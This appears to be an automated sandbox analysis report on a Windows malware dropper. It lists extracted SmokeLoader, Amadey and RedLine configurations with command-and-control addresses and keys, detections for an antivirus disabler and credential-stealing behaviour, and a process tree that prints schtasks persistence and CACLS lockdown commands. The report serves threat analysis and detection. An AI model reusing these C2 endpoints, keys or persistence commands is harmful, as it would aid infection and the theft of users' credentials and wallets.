Analysis

  • max time kernel
    152s
  • max time network
    159s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230915-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
  • submitted
    11/10/2023, 22:56 UTC

General

  • Target

    4d8b9f52a3394a627011d165de3815d02ddbd4edfb4f432b91154ae3a811673f.exe

  • Size

    239KB

  • MD5

    6cadca597fe12fcc21ddc6ada216a258

  • SHA1

    cf5f36c9b3c362f44e558e90c1771b051de9cf03

  • SHA256

    4d8b9f52a3394a627011d165de3815d02ddbd4edfb4f432b91154ae3a811673f

  • SHA512

    b7d7b28ac1a4a30aa3b80a39f4986bd9008bf2931b48dcb7c9323f126abc412b32d809a0eaaa4f412d170aaa2a3e861be14bc82d353ede01db1f9dd0a77094cf

  • SSDEEP

    6144:dz46fuYXChoQTjlFgLuCY1dRuAOLuQFmI3yluw8y0:dcYzXChdTbv1bu4QoI3Dw8y

Malware Config

Extracted

Family

smokeloader

Version

2022

C2

http://77.91.68.29/fks/

rc4.i32
1
0x4b3b02b6
rc4.i32
1
0x6ea683ed

Extracted

Family

amadey

Version

3.89

C2

http://77.91.124.1/theme/index.php

Attributes
  • install_dir

    fefffe8cea

  • install_file

    explothe.exe

  • strings_key

    36a96139c1118a354edf72b1080d4b2f

rc4.plain
1
006700e5a2ab05704bbb0c589b88924d

Extracted

Family

amadey

Version

3.83

C2

http://5.42.65.80/8bmeVwqx/index.php

Attributes
  • install_dir

    207aa4515d

  • install_file

    oneetx.exe

  • strings_key

    3e634dd0840c68ae2ced83c2be7bf0d4

rc4.plain
1
07c6bc37dc50874878dcb010336ed906

Extracted

Family

redline

Botnet

breha

C2

77.91.124.55:19071

Extracted

Family

redline

Botnet

pixelscloud

C2

85.209.176.171:80

Extracted

Family

redline

Botnet

@ytlogsbot

C2

185.216.70.238:37515

Extracted

Family

redline

Botnet

kukish

C2

77.91.124.55:19071

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Detects Healer an antivirus disabler dropper 3 IoCs
  • Healer

    Healer an antivirus disabler dropper.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 34 IoCs
  • SectopRAT

    SectopRAT is a remote access trojan first seen in November 2019.

  • SectopRAT payload 3 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Downloads MZ/PE file
  • .NET Reactor proctector 20 IoCs

    Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

  • Checks computer location settings 2 TTPs 4 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 22 IoCs
  • Loads dropped DLL 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Uses the VBS compiler for execution 1 TTPs
  • Windows security modification 2 TTPs 1 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 5 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Detected potential entity reuse from brand microsoft.
  • Suspicious use of SetThreadContext 5 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 5 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 11 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 26 IoCs
  • Suspicious use of SendNotifyMessage 24 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\4d8b9f52a3394a627011d165de3815d02ddbd4edfb4f432b91154ae3a811673f.exe
    "C:\Users\Admin\AppData\Local\Temp\4d8b9f52a3394a627011d165de3815d02ddbd4edfb4f432b91154ae3a811673f.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:4112
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
      2⤵
      • Checks SCSI registry key(s)
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      PID:3388
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4112 -s 252
      2⤵
      • Program crash
      PID:2796
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 4112 -ip 4112
    1⤵
      PID:1560
    • C:\Users\Admin\AppData\Local\Temp\FF5F.exe
      C:\Users\Admin\AppData\Local\Temp\FF5F.exe
      1⤵
      • Executes dropped EXE
      • Adds Run key to start application
      • Suspicious use of WriteProcessMemory
      PID:5020
      • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\xr0Td0It.exe
        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\xr0Td0It.exe
        2⤵
        • Executes dropped EXE
        • Adds Run key to start application
        • Suspicious use of WriteProcessMemory
        PID:3916
        • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\xN2sf8rg.exe
          C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\xN2sf8rg.exe
          3⤵
          • Executes dropped EXE
          • Adds Run key to start application
          • Suspicious use of WriteProcessMemory
          PID:912
          • C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\ET5IP1EJ.exe
            C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\ET5IP1EJ.exe
            4⤵
            • Executes dropped EXE
            • Adds Run key to start application
            • Suspicious use of WriteProcessMemory
            PID:4892
            • C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\tG9gH5xJ.exe
              C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\tG9gH5xJ.exe
              5⤵
              • Executes dropped EXE
              • Adds Run key to start application
              • Suspicious use of WriteProcessMemory
              PID:3632
              • C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Gq90PX8.exe
                C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Gq90PX8.exe
                6⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • Suspicious use of WriteProcessMemory
                PID:4656
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                  7⤵
                    PID:5000
                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                    7⤵
                      PID:4916
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 4916 -s 196
                        8⤵
                        • Program crash
                        PID:4552
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 4656 -s 148
                      7⤵
                      • Program crash
                      PID:3212
                  • C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2QN962xW.exe
                    C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2QN962xW.exe
                    6⤵
                    • Executes dropped EXE
                    PID:5964
        • C:\Users\Admin\AppData\Local\Temp\1B2.exe
          C:\Users\Admin\AppData\Local\Temp\1B2.exe
          1⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • Suspicious use of WriteProcessMemory
          PID:2540
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
            2⤵
              PID:1460
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
              2⤵
                PID:2928
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                2⤵
                  PID:2876
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                  2⤵
                    PID:1208
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 2540 -s 268
                    2⤵
                    • Program crash
                    PID:3304
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\397.bat" "
                  1⤵
                  • Suspicious use of WriteProcessMemory
                  PID:4896
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login
                    2⤵
                      PID:2664
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffe71c146f8,0x7ffe71c14708,0x7ffe71c14718
                        3⤵
                          PID:4444
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2084,15813340754539802934,1680463166261357015,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2148 /prefetch:3
                          3⤵
                            PID:5256
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2084,15813340754539802934,1680463166261357015,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2096 /prefetch:2
                            3⤵
                              PID:5248
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/
                            2⤵
                            • Enumerates system info in registry
                            • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                            • Suspicious use of FindShellTrayWindow
                            • Suspicious use of SendNotifyMessage
                            PID:3716
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe71c146f8,0x7ffe71c14708,0x7ffe71c14718
                              3⤵
                                PID:4852
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2124,3080358234619567147,7434752836164722549,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2216 /prefetch:3
                                3⤵
                                  PID:2580
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2124,3080358234619567147,7434752836164722549,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2136 /prefetch:2
                                  3⤵
                                    PID:2956
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2124,3080358234619567147,7434752836164722549,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2900 /prefetch:8
                                    3⤵
                                      PID:3484
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,3080358234619567147,7434752836164722549,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3512 /prefetch:1
                                      3⤵
                                        PID:2784
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,3080358234619567147,7434752836164722549,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3384 /prefetch:1
                                        3⤵
                                          PID:4644
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,3080358234619567147,7434752836164722549,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4712 /prefetch:1
                                          3⤵
                                            PID:5268
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,3080358234619567147,7434752836164722549,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5656 /prefetch:1
                                            3⤵
                                              PID:5132
                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,3080358234619567147,7434752836164722549,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5640 /prefetch:1
                                              3⤵
                                                PID:6076
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2124,3080358234619567147,7434752836164722549,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5452 /prefetch:8
                                                3⤵
                                                  PID:3732
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2124,3080358234619567147,7434752836164722549,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5452 /prefetch:8
                                                  3⤵
                                                    PID:4076
                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,3080358234619567147,7434752836164722549,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4796 /prefetch:1
                                                    3⤵
                                                      PID:6080
                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,3080358234619567147,7434752836164722549,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4780 /prefetch:1
                                                      3⤵
                                                        PID:5836
                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,3080358234619567147,7434752836164722549,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6832 /prefetch:1
                                                        3⤵
                                                          PID:6064
                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,3080358234619567147,7434752836164722549,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6044 /prefetch:1
                                                          3⤵
                                                            PID:5852
                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,3080358234619567147,7434752836164722549,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6872 /prefetch:1
                                                            3⤵
                                                              PID:6112
                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,3080358234619567147,7434752836164722549,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6868 /prefetch:1
                                                              3⤵
                                                                PID:5336
                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 2540 -ip 2540
                                                            1⤵
                                                              PID:3236
                                                            • C:\Users\Admin\AppData\Local\Temp\770.exe
                                                              C:\Users\Admin\AppData\Local\Temp\770.exe
                                                              1⤵
                                                              • Executes dropped EXE
                                                              • Suspicious use of SetThreadContext
                                                              PID:4696
                                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                                                                2⤵
                                                                  PID:116
                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4696 -s 148
                                                                  2⤵
                                                                  • Program crash
                                                                  PID:620
                                                              • C:\Users\Admin\AppData\Local\Temp\2A8A.exe
                                                                C:\Users\Admin\AppData\Local\Temp\2A8A.exe
                                                                1⤵
                                                                • Modifies Windows Defender Real-time Protection settings
                                                                • Executes dropped EXE
                                                                • Windows security modification
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:1736
                                                              • C:\Users\Admin\AppData\Local\Temp\2E63.exe
                                                                C:\Users\Admin\AppData\Local\Temp\2E63.exe
                                                                1⤵
                                                                • Checks computer location settings
                                                                • Executes dropped EXE
                                                                PID:2268
                                                                • C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
                                                                  "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"
                                                                  2⤵
                                                                  • Checks computer location settings
                                                                  • Executes dropped EXE
                                                                  PID:5356
                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                    "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe" /F
                                                                    3⤵
                                                                    • Creates scheduled task(s)
                                                                    PID:6040
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "Admin:N"&&CACLS "explothe.exe" /P "Admin:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "Admin:N"&&CACLS "..\fefffe8cea" /P "Admin:R" /E&&Exit
                                                                    3⤵
                                                                      PID:2060
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                        4⤵
                                                                          PID:5712
                                                                        • C:\Windows\SysWOW64\cacls.exe
                                                                          CACLS "explothe.exe" /P "Admin:N"
                                                                          4⤵
                                                                            PID:6136
                                                                          • C:\Windows\SysWOW64\cacls.exe
                                                                            CACLS "explothe.exe" /P "Admin:R" /E
                                                                            4⤵
                                                                              PID:6104
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                              4⤵
                                                                                PID:4260
                                                                              • C:\Windows\SysWOW64\cacls.exe
                                                                                CACLS "..\fefffe8cea" /P "Admin:N"
                                                                                4⤵
                                                                                  PID:5832
                                                                                • C:\Windows\SysWOW64\cacls.exe
                                                                                  CACLS "..\fefffe8cea" /P "Admin:R" /E
                                                                                  4⤵
                                                                                    PID:1000
                                                                                • C:\Windows\SysWOW64\rundll32.exe
                                                                                  "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
                                                                                  3⤵
                                                                                  • Loads dropped DLL
                                                                                  PID:1368
                                                                            • C:\Users\Admin\AppData\Local\Temp\3308.exe
                                                                              C:\Users\Admin\AppData\Local\Temp\3308.exe
                                                                              1⤵
                                                                              • Checks computer location settings
                                                                              • Executes dropped EXE
                                                                              • Suspicious use of FindShellTrayWindow
                                                                              PID:2132
                                                                              • C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
                                                                                "C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe"
                                                                                2⤵
                                                                                • Checks computer location settings
                                                                                • Executes dropped EXE
                                                                                PID:5616
                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                  "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe" /F
                                                                                  3⤵
                                                                                  • Creates scheduled task(s)
                                                                                  PID:5736
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "oneetx.exe" /P "Admin:N"&&CACLS "oneetx.exe" /P "Admin:R" /E&&echo Y|CACLS "..\207aa4515d" /P "Admin:N"&&CACLS "..\207aa4515d" /P "Admin:R" /E&&Exit
                                                                                  3⤵
                                                                                    PID:5900
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                                      4⤵
                                                                                        PID:5352
                                                                                      • C:\Windows\SysWOW64\cacls.exe
                                                                                        CACLS "oneetx.exe" /P "Admin:N"
                                                                                        4⤵
                                                                                          PID:1596
                                                                                        • C:\Windows\SysWOW64\cacls.exe
                                                                                          CACLS "oneetx.exe" /P "Admin:R" /E
                                                                                          4⤵
                                                                                            PID:732
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                                            4⤵
                                                                                              PID:1928
                                                                                            • C:\Windows\SysWOW64\cacls.exe
                                                                                              CACLS "..\207aa4515d" /P "Admin:N"
                                                                                              4⤵
                                                                                                PID:2340
                                                                                              • C:\Windows\SysWOW64\cacls.exe
                                                                                                CACLS "..\207aa4515d" /P "Admin:R" /E
                                                                                                4⤵
                                                                                                  PID:1456
                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 4656 -ip 4656
                                                                                            1⤵
                                                                                              PID:1812
                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 4696 -ip 4696
                                                                                              1⤵
                                                                                                PID:1956
                                                                                              • C:\Users\Admin\AppData\Local\Temp\372F.exe
                                                                                                C:\Users\Admin\AppData\Local\Temp\372F.exe
                                                                                                1⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:2208
                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=372F.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
                                                                                                  2⤵
                                                                                                    PID:6056
                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe71c146f8,0x7ffe71c14708,0x7ffe71c14718
                                                                                                      3⤵
                                                                                                        PID:6120
                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=372F.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
                                                                                                      2⤵
                                                                                                        PID:5856
                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe71c146f8,0x7ffe71c14708,0x7ffe71c14718
                                                                                                          3⤵
                                                                                                            PID:2288
                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 4916 -ip 4916
                                                                                                        1⤵
                                                                                                          PID:724
